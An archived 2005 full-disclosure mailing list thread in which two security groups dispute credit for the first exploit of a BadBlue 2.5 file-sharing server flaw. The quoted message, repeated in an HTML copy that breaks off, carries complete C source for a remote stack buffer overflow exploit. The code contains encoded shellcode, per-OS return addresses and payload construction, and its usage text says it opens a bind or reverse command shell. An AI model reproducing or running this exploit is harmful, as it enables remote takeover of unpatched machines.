[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-Disclosure] [HAT-SQUAD] BadBlue,
From: "class 101" <class101 () hat-squad ! com>
Date: 2005-02-28 13:37:55
Message-ID: 002a01c51d9a$b67f6ae0$0200a8c0 () box
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)next \
time then publish both in same time because coded or not because of timeline , the exploit has \
been brought in first by hat-squad , sorry ;>
-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: Andres Tarasco
To: 'class101@hat-squad.com'
Cc: 'full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org'
Sent: Monday, February 28, 2005 11:18 AM
Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit \
(update)
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
Thats simply not true.
Miguel Tarasco developed the first functional exploit for this vulnerability.
This exploit was not published before because of disclosure Timeline.
regards
On Mon, 28 Feb 2005 09:42:11 +0100, class 101 <class101@hat-squad.com> wrote:
> (reposting again with the hole history)
> Andres Tarasco of sia.es has published yesterday a security hole affecting
> BadBlue 2.5 and below.
>
> http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html
>
> Hat-Squad.com brought you a fresh exploit.
> The exploit and BadBlue v2.5 are both available at class101.org for your
> exploitation's pratices, njoy :)
>
> /*
> BadBlue, Easy File Sharing Remote BOverflow
>
> Homepage: badblue.com
> Affected version: v2.5 (2.60 and below not tested)
> Patched version: v2.61
> Link: badblue.com/bbs98.exe
> Date: 27 February 2005
>
> Application Risk: Severely High
> Internet Risk: Low
>
> Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)
> Exploit Credits : class101 & metasploit.com
>
> Hole History:
>
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date :>
> or you sux doing private stuffs.
>
> Notes:
>
> -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
> BadBlue
> -using offsets from ext.dll, universal.
> -use findjmp2 to quick search into ext.dll to see
> if the offsets changes in the others BadBlue's versions below 2.5
> -if you need the v2.5 for exploitation's pratices, get it on class101.org
> -rename to .c for nux, haven't tested this one but it should works fine.
>
> Greet:
>
> Nima Majidi
> Behrang Fouladi
> Pejman
> Hat-Squad.com
> metasploit.com
> A^C^E of addict3d.org
> str0ke of milw0rm.com
> and my homy class101.org :>
> */
>
> #include <stdio.h>
> #include <string.h>
> #include <time.h>
> #ifdef WIN32
> #include "winsock2.h"
> #pragma comment(lib, "ws2_32")
> #else
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/in_systm.h>
> #include <netinet/ip.h>
> #include <netdb.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <stdlib.h>
> #include <fcntl.h>
> #endif
>
> char scode[]=
> /*XORed, I kiss metasploit.com because they are what means elite!*/
> "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
> "\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
> "\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
> "\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
> "\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
> "\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
> "\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
> "\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
> "\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
> "\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
> "\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
> "\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
> "\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
> "\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
> "\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
> "\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
> "\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
> "\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
> "\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
> "\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
> "\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
> "\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";
>
> char payload[1024];
>
> char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
> char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
> char pad[]="\xEB\x0C\x90\x90";
> char pad2[]="\xE9\x05\xFE\xFF\xFF";
> char EOL[]="\x0D\x0A\x0D\x0A";
> char talk[]=
> "\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
> "\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";
>
> #ifdef WIN32
> WSADATA wsadata;
> #endif
>
> void ver();
> void usage(char* us);
>
> int main(int argc,char *argv[])
> {
> ver();
> unsigned long gip;
> unsigned short gport;
> char *target, *os;
> if
> (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;
> }
> if (argc==5){usage(argv[0]);return -1;}
> if (strlen(argv[2])<7){usage(argv[0]);return -1;}
> if (argc==6)
> {
> if (strlen(argv[4])<7){usage(argv[0]);return -1;}
> }
> #ifndef WIN32
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(long)0x93939393;
> gport=htons(atoi(argv[5]))^(short)0x9393;
> }
> #define Sleep sleep
> #define SOCKET int
> #define closesocket(s) close(s)
> #else
> if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup
> error\n");return -1;}
> if (argc==6)
> {
> gip=inet_addr(argv[4])^(ULONG)0x93939393;
> gport=htons(atoi(argv[5]))^(USHORT)0x9393;
> }
> #endif
> int ip=htonl(inet_addr(argv[2])), port;
> if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
> SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
> s=socket(AF_INET,SOCK_STREAM,0);
> if (s==-1){printf("[+] socket() error\n");return -1;}
> if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+]
> Win2k SP4 Pro. English\n[+] Win2k SP- - -";}
> if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+]
> WinXP SP1a Pro. English\n[+] WinXP SP- - -";}
> if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+]
> Win2003 SP- - -";}
> printf("[+] target(s): %s\n",os);
> server.sin_family=AF_INET;
> server.sin_addr.s_addr=htonl(ip);
> server.sin_port=htons(port);
> if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
> printf("[+] get the source at class101.org and update
> yourself!\n");return -1;}
> connect(s,( struct sockaddr *)&server,sizeof(server));
> timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
> switch(select(s+1,NULL,&mask,NULL,&timeout))
> {
> case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
> case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
> default:
> if(FD_ISSET(s,&mask))
> {
> printf("[+] connected, constructing the payload...\n");
> #ifdef WIN32
> Sleep(1000);
> #else
> Sleep(1);
> #endif
> strcpy(payload,talk);
> memset(payload+29,0x90,520);
> if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
> {
> memcpy(payload+29+492,&pad,4);
> memcpy(payload+521+4,target,4);
> memcpy(payload+536+1,pad2,5);
> }
> else
> {
> memcpy(payload+29+485,&pad,4);
> memcpy(payload+514+4,target,4);
> memcpy(payload+529+1,pad2,5);
> }
> strcat(payload,EOL);
> memcpy(payload+36+3,scode,strlen(scode));
> if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1,
> the server prolly rebooted.\n");return -1;}
> #ifdef WIN32
> Sleep(2000);
> #else
> Sleep(2);
> #endif
>
> printf("[+] size of payload: %d\n",strlen(payload));
> printf("[+] payload sent.\n");
> return 0;
> }
> }
> closesocket(s);
> #ifdef WIN32
> WSACleanup();
> #endif
> return 0;
> }
>
> void usage(char* us)
> {
> printf("USAGE:\n");
> printf(" [+] . 101_bblu.exe Target VulnIP (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
> printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT
> (reverse mode)\n");
> printf("TARGET: \n");
> printf(" [+] 1. Win2k SP4 Server English (*)\n");
> printf(" [+] 1. Win2k SP4 Pro English (*)\n");
> printf(" [+] 1. Win2k SP- - - \n");
> printf(" [+] 2. WinXP SP2 Pro. English \n");
> printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
> printf(" [+] 2. WinXP SP- - - \n");
> printf(" [+] 3. Win2k3 SP0 Server Italian (*)\n");
> printf(" [+] 3. Win2k3 SP- - - \n");
> printf("NOTE: \n");
> printf(" The exploit bind a cmdshell port 101 or\n");
> printf(" reverse a cmdshell on your listener.\n");
> printf(" A wildcard (*) mean tested working, else, supposed
> working.\n");
> printf(" A symbol (-) mean all.\n");
> printf(" Compilation msvc6, cygwin, Linux.\n");
> return;
> }
> void ver()
> {
> printf("
> \n");
> printf("
> ===================================================[0.1]=====\n");
> printf(" ================BadBlue, Easy File Sharing
> 2.5===============\n");
> printf(" ================ext.dll, Remote Stack
> Overflow===============\n");
> printf(" ======coded by
> class101==================[Hat-Squad.com]=====\n");
> printf(" =====================================[class101.org
> 2005]=====\n");
> printf("
> \n");
> }
>
> -------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
> -------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
Loco de aTar
[Attachment #5 (text/html)]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote \
Exploit (update)</TITLE> <META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>next time then publish both in same time because
coded or not because of timeline , the exploit has been brought in first by
hat-squad , sorry ;></FONT></DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>-------------------------------------------------------------<BR>class101<BR>Jr.
Researcher<BR>Hat-Squad.com<BR>-------------------------------------------------------------</DIV>
<BLOCKQUOTE
style="BORDER-LEFT: #000000 2px solid; MARGIN-LEFT: 5px; MARGIN-RIGHT: 0px; PADDING-LEFT: 5px; \
PADDING-RIGHT: 0px"> <DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A href="mailto:atarasco@sia.es" title=atarasco@sia.es>Andres Tarasco</A>
</DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A
href="mailto:'class101@hat-squad.com'"
title=class101@hat-squad.com>'class101@hat-squad.com'</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Cc:</B> <A
href="mailto:'full-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org'"
title=dailydave@lists.immunitysec.com,>'full-disclosure@lists.netsys.com,
vulnwatch@vulnwatch.org'</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Monday, February 28, 2005 11:18
AM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> RE: [Full-Disclosure]
[HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)</DIV>
<DIV><BR></DIV>
<P><FONT size=2>> Hole History:</FONT> <BR><FONT size=2>></FONT>
<BR><FONT size=2>> 26-2-2005: BOF flaw published by Andres
Tarasco of sia.es</FONT> <BR><FONT size=2>> 27-2-2002:
Hat-Squad.com releases an exploit</FONT> <BR><FONT size=2>>
28-2-2005: haxorcitos releases a dupe with fake date :></FONT> <BR><FONT
size=2>>
or you sux doing private stuffs.</FONT> </P>
<P><FONT size=2>Thats simply not true.</FONT> <BR><FONT size=2>Miguel Tarasco
developed the first functional exploit for this vulnerability.</FONT>
<BR><FONT size=2>This exploit was not published before because of disclosure
Timeline.</FONT> </P>
<P><FONT size=2>regards</FONT> </P><BR><BR>
<P><FONT size=2>On Mon, 28 Feb 2005 09:42:11 +0100, class 101
<class101@hat-squad.com> wrote:</FONT> <BR><FONT size=2>> (reposting
again with the hole history)</FONT> <BR><FONT size=2>> Andres Tarasco of
sia.es has published yesterday a security hole affecting</FONT> <BR><FONT
size=2>> BadBlue 2.5 and below.</FONT> <BR><FONT size=2>>
</FONT><BR><FONT size=2>> <A
href="http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html"
target=_blank>http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html</A></FONT>
<BR><FONT size=2>> </FONT><BR><FONT size=2>> Hat-Squad.com brought you a
fresh exploit.</FONT> <BR><FONT size=2>> The exploit and BadBlue v2.5 are
both available at class101.org for your</FONT> <BR><FONT size=2>>
exploitation's pratices, njoy :)</FONT> <BR><FONT size=2>> </FONT><BR><FONT
size=2>> /*</FONT> <BR><FONT size=2>> BadBlue, Easy File Sharing Remote
BOverflow</FONT> <BR><FONT size=2>> </FONT><BR><FONT size=2>>
Homepage: badblue.com</FONT>
<BR><FONT size=2>> Affected version: v2.5 (2.60 and below not
tested)</FONT> <BR><FONT size=2>> Patched version: v2.61</FONT>
<BR><FONT size=2>>
Link:
badblue.com/bbs98.exe</FONT> <BR><FONT size=2>>
Date:
27 February 2005</FONT> <BR><FONT size=2>> </FONT><BR><FONT size=2>>
Application Risk: Severely High</FONT> <BR><FONT size=2>> Internet
Risk: Low</FONT> <BR><FONT size=2>> </FONT><BR><FONT
size=2>> Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)</FONT>
<BR><FONT size=2>> Exploit Credits : class101 & metasploit.com</FONT>
<BR><FONT size=2>> </FONT><BR><FONT size=2>> Hole History:</FONT>
<BR><FONT size=2>> </FONT><BR><FONT size=2>> 26-2-2005: BOF
flaw published by Andres Tarasco of sia.es</FONT> <BR><FONT
size=2>> 27-2-2002: Hat-Squad.com releases an exploit</FONT>
<BR><FONT size=2>> 28-2-2005: haxorcitos releases a dupe with
fake date :></FONT> <BR><FONT
size=2>>
or you sux doing private stuffs.</FONT> <BR><FONT size=2>> </FONT><BR><FONT
size=2>> Notes:</FONT> <BR><FONT size=2>> </FONT><BR><FONT
size=2>> -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C,
badly interpreted by</FONT> <BR><FONT size=2>> BadBlue</FONT> <BR><FONT
size=2>> -using offsets from ext.dll, universal.</FONT>
<BR><FONT size=2>> -use findjmp2 to quick search into ext.dll
to see</FONT> <BR><FONT size=2>> if the offsets changes
in the others BadBlue's versions below 2.5</FONT> <BR><FONT
size=2>> -if you need the v2.5 for exploitation's pratices, get
it on class101.org</FONT> <BR><FONT size=2>> -rename to .c for
nux, haven't tested this one but it should works fine.</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>> Greet:</FONT> <BR><FONT size=2>>
</FONT><BR><FONT size=2>> Nima Majidi</FONT> <BR><FONT
size=2>> Behrang
Fouladi</FONT> <BR><FONT size=2>> Pejman</FONT> <BR><FONT
size=2>> Hat-Squad.com</FONT> <BR><FONT size=2>>
metasploit.com</FONT> <BR><FONT size=2>> A^C^E of
addict3d.org</FONT> <BR><FONT size=2>> str0ke of
milw0rm.com</FONT> <BR><FONT size=2>> and my homy class101.org
:></FONT> <BR><FONT size=2>> */</FONT> <BR><FONT size=2>>
</FONT><BR><FONT size=2>> #include <stdio.h></FONT> <BR><FONT
size=2>> #include <string.h></FONT> <BR><FONT size=2>> #include
<time.h></FONT> <BR><FONT size=2>> #ifdef WIN32</FONT> <BR><FONT
size=2>> #include "winsock2.h"</FONT> <BR><FONT size=2>> #pragma
comment(lib, "ws2_32")</FONT> <BR><FONT size=2>> #else</FONT> <BR><FONT
size=2>> #include <sys/socket.h></FONT> <BR><FONT size=2>>
#include <sys/types.h></FONT> <BR><FONT size=2>> #include
<netinet/in.h></FONT> <BR><FONT size=2>> #include
<netinet/in_systm.h></FONT> <BR><FONT size=2>> #include
<netinet/ip.h></FONT> <BR><FONT size=2>> #include
<netdb.h></FONT> <BR><FONT size=2>> #include
<arpa/inet.h></FONT> <BR><FONT size=2>> #include
<unistd.h></FONT> <BR><FONT size=2>> #include <stdlib.h></FONT>
<BR><FONT size=2>> #include <fcntl.h></FONT> <BR><FONT size=2>>
#endif</FONT> <BR><FONT size=2>> </FONT><BR><FONT size=2>> char
scode[]=</FONT> <BR><FONT size=2>> /*XORed, I kiss metasploit.com because
they are what means elite!*/</FONT> <BR><FONT size=2>>
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"</FONT>
<BR><FONT size=2>>
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"</FONT>
<BR><FONT size=2>>
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"</FONT>
<BR><FONT size=2>>
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"</FONT>
<BR><FONT size=2>>
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"</FONT>
<BR><FONT size=2>>
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"</FONT>
<BR><FONT size=2>>
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"</FONT>
<BR><FONT size=2>>
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"</FONT>
<BR><FONT size=2>>
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"</FONT>
<BR><FONT size=2>>
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"</FONT>
<BR><FONT size=2>>
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"</FONT>
<BR><FONT size=2>>
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"</FONT>
<BR><FONT size=2>>
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"</FONT>
<BR><FONT size=2>>
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"</FONT>
<BR><FONT size=2>>
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"</FONT>
<BR><FONT size=2>>
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"</FONT>
<BR><FONT size=2>>
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"</FONT>
<BR><FONT size=2>>
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"</FONT>
<BR><FONT size=2>>
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"</FONT>
<BR><FONT size=2>>
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"</FONT>
<BR><FONT size=2>>
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"</FONT>
<BR><FONT size=2>>
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>> char payload[1024];</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>> char ebx[]="\x05\x53\x02\x10";
/*call.ext.dll*/</FONT> <BR><FONT size=2>> char ebx2[]="\xB0\x55\x02\x10";
/*pop.pop.ret.ext.dll thx findjmp2 ;>*/</FONT> <BR><FONT size=2>> char
pad[]="\xEB\x0C\x90\x90";</FONT> <BR><FONT size=2>> char
pad2[]="\xE9\x05\xFE\xFF\xFF";</FONT> <BR><FONT size=2>> char
EOL[]="\x0D\x0A\x0D\x0A";</FONT> <BR><FONT size=2>> char talk[]=</FONT>
<BR><FONT size=2>>
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"</FONT>
<BR><FONT size=2>>
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>> #ifdef WIN32</FONT> <BR><FONT
size=2>> WSADATA wsadata;</FONT> <BR><FONT size=2>> #endif</FONT>
<BR><FONT size=2>> </FONT><BR><FONT size=2>> void ver();</FONT>
<BR><FONT size=2>> void usage(char* us);</FONT> <BR><FONT size=2>>
</FONT><BR><FONT size=2>> int main(int argc,char *argv[])</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT size=2>> ver();</FONT> <BR><FONT
size=2>> unsigned long gip;</FONT> <BR><FONT size=2>>
unsigned short gport;</FONT> <BR><FONT size=2>> char *target,
*os;</FONT> <BR><FONT size=2>> if</FONT> <BR><FONT size=2>>
(argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return
-1;</FONT> <BR><FONT size=2>> }</FONT> <BR><FONT size=2>> if
(argc==5){usage(argv[0]);return -1;}</FONT> <BR><FONT
size=2>> if
(strlen(argv[2])<7){usage(argv[0]);return -1;}</FONT> <BR><FONT
size=2>> if (argc==6)</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT
size=2>> if
(strlen(argv[4])<7){usage(argv[0]);return -1;}</FONT> <BR><FONT
size=2>> }</FONT> <BR><FONT size=2>> #ifndef WIN32</FONT>
<BR><FONT size=2>> if (argc==6)</FONT> <BR><FONT size=2>>
{</FONT> <BR><FONT size=2>>
gip=inet_addr(argv[4])^(long)0x93939393;</FONT> <BR><FONT
size=2>> gport=htons(atoi(argv[5]))^(short)0x9393;</FONT>
<BR><FONT size=2>> }</FONT> <BR><FONT size=2>> #define Sleep
sleep</FONT> <BR><FONT size=2>> #define SOCKET int</FONT> <BR><FONT
size=2>> #define closesocket(s) close(s)</FONT> <BR><FONT size=2>>
#else</FONT> <BR><FONT size=2>> if
(WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup</FONT>
<BR><FONT size=2>> error\n");return -1;}</FONT> <BR><FONT size=2>>
if (argc==6)</FONT> <BR><FONT size=2>> {</FONT> <BR><FONT
size=2>> gip=inet_addr(argv[4])^(ULONG)0x93939393;</FONT>
<BR><FONT size=2>>
gport=htons(atoi(argv[5]))^(USHORT)0x9393;</FONT> <BR><FONT size=2>>
}</FONT> <BR><FONT size=2>> #endif</FONT> <BR><FONT size=2>> int
ip=htonl(inet_addr(argv[2])), port;</FONT> <BR><FONT size=2>> if
(argc==4||argc==6){port=atoi(argv[3]);} else port=80;</FONT> <BR><FONT
size=2>> SOCKET s;fd_set mask;struct timeval timeout; struct
sockaddr_in server;</FONT> <BR><FONT size=2>>
s=socket(AF_INET,SOCK_STREAM,0);</FONT> <BR><FONT size=2>> if
(s==-1){printf("[+] socket() error\n");return -1;}</FONT> <BR><FONT
size=2>> if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server
English\n[+]</FONT> <BR><FONT size=2>> Win2k SP4 Pro.
English\n[+]
Win2k SP- - -";}</FONT> <BR><FONT
size=2>> if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro.
English\n[+]</FONT> <BR><FONT size=2>> WinXP SP1a Pro.
English\n[+]
WinXP SP- - -";}</FONT> <BR><FONT size=2>> if
(atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+]</FONT>
<BR><FONT size=2>> Win2003 SP- - -";}</FONT>
<BR><FONT size=2>> printf("[+] target(s): %s\n",os);</FONT> <BR><FONT
size=2>> server.sin_family=AF_INET;</FONT> <BR><FONT
size=2>> server.sin_addr.s_addr=htonl(ip);</FONT> <BR><FONT
size=2>> server.sin_port=htons(port);</FONT> <BR><FONT
size=2>> if (argc==6){printf("[+] reverse mode disabled for this
exploit\n");</FONT> <BR><FONT size=2>> printf("[+] get the source at
class101.org and update</FONT> <BR><FONT size=2>> yourself!\n");return
-1;}</FONT> <BR><FONT size=2>> connect(s,( struct sockaddr
*)&server,sizeof(server));</FONT> <BR><FONT size=2>>
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);</FONT>
<BR><FONT size=2>>
switch(select(s+1,NULL,&mask,NULL,&timeout))</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT size=2>> case -1:
{printf("[+] select() error\n");closesocket(s);return -1;}</FONT> <BR><FONT
size=2>> case 0: {printf("[+] connect()
error\n");closesocket(s);return -1;}</FONT> <BR><FONT size=2>>
default:</FONT> <BR><FONT size=2>>
if(FD_ISSET(s,&mask))</FONT> <BR><FONT size=2>> {</FONT>
<BR><FONT size=2>> printf("[+] connected, constructing
the payload...\n");</FONT> <BR><FONT size=2>> #ifdef WIN32</FONT> <BR><FONT
size=2>> Sleep(1000);</FONT> <BR><FONT size=2>>
#else</FONT> <BR><FONT size=2>> Sleep(1);</FONT>
<BR><FONT size=2>> #endif</FONT> <BR><FONT size=2>>
strcpy(payload,talk);</FONT> <BR><FONT size=2>>
memset(payload+29,0x90,520);</FONT> <BR><FONT size=2>> if
(atoi(argv[1]) == 1||atoi(argv[1]) == 2)</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT
size=2>> memcpy(payload+29+492,&pad,4);</FONT>
<BR><FONT size=2>>
memcpy(payload+521+4,target,4);</FONT> <BR><FONT
size=2>> memcpy(payload+536+1,pad2,5);</FONT>
<BR><FONT size=2>> }</FONT> <BR><FONT
size=2>> else</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT
size=2>> memcpy(payload+29+485,&pad,4);</FONT>
<BR><FONT size=2>>
memcpy(payload+514+4,target,4);</FONT> <BR><FONT
size=2>> memcpy(payload+529+1,pad2,5);</FONT>
<BR><FONT size=2>> }</FONT> <BR><FONT
size=2>> strcat(payload,EOL);</FONT> <BR><FONT
size=2>> memcpy(payload+36+3,scode,strlen(scode));</FONT>
<BR><FONT size=2>> if
(send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1,</FONT>
<BR><FONT size=2>> the server prolly rebooted.\n");return -1;}</FONT>
<BR><FONT size=2>> #ifdef WIN32</FONT> <BR><FONT
size=2>> Sleep(2000);</FONT> <BR><FONT size=2>>
#else</FONT> <BR><FONT size=2>> Sleep(2);</FONT>
<BR><FONT size=2>> #endif</FONT> <BR><FONT size=2>> </FONT><BR><FONT
size=2>> printf("[+] size of payload:
%d\n",strlen(payload));</FONT> <BR><FONT size=2>>
printf("[+] payload sent.\n");</FONT> <BR><FONT size=2>>
return 0;</FONT> <BR><FONT size=2>> }</FONT> <BR><FONT
size=2>> }</FONT> <BR><FONT size=2>> closesocket(s);</FONT>
<BR><FONT size=2>> #ifdef WIN32</FONT> <BR><FONT size=2>>
WSACleanup();</FONT> <BR><FONT size=2>> #endif</FONT> <BR><FONT
size=2>> return 0;</FONT> <BR><FONT size=2>> }</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>> void usage(char* us)</FONT> <BR><FONT
